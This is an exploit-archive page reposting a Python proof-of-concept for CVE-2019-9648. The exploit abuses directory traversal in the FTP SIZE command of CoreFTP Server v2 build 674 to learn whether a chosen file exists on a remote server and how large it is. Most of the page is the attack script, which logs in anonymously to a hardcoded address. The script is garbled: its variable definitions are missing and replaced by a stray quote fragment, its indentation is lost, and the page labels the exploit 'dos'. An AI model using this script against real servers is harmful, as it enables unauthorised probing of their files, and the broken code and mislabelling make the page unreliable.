Core ftp server ftp / sftp server v2 build 674 size directory traversal Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-03-13 |
Type : dos |
Platform : windows
This exploit / vulnerability Core ftp server ftp / sftp server v2 build 674 size directory traversal is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: CoreFTP Server FTP / SFTP Server v2 - Build 674 SIZE Directory Traversal
# Google Dork: N/A
# Date: 4/27/2019
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.coreftp.com
# Software Link: http://www.coreftp.com/server/index.html
# Version: Firmware: CoreFTP Server FTP / SFTP Server v2 - Build 674
# Tested on: Windows 7
# CVE : CVE-2019-9648
#!/usr/bin/python
import socket
import sys
########################################################
###########Set Variables For Script Here################
""")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = s.connect(('192.168.0.4',21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.recv(1024)
s.send('SIZE' +local_disk_drive+path_traversal+file_to_look_for + '\r\n')
result = s.recv(2048)
trimmedoutput = result.strip()
splitoutput = trimmedoutput.split(' ')
realresult = unicode (trimmedoutput,'utf-8')
realresult2 = unicode (splitoutput[1],'utf-8')
isnum = realresult.isnumeric()
isnum2 = realresult2.isnumeric()
if isnum2:
print "The file " + file_to_look_for + " exist on the remote server. Here is the filesize:" + splitoutput[1]
else:
print "The file " + file_to_look_for + " does not exist on the remote server or one of the variables declared is incorrect."
s.send('QUIT\r\n')
s.close
Core ftp server ftp / sftp server v2 build 674 size directory traversal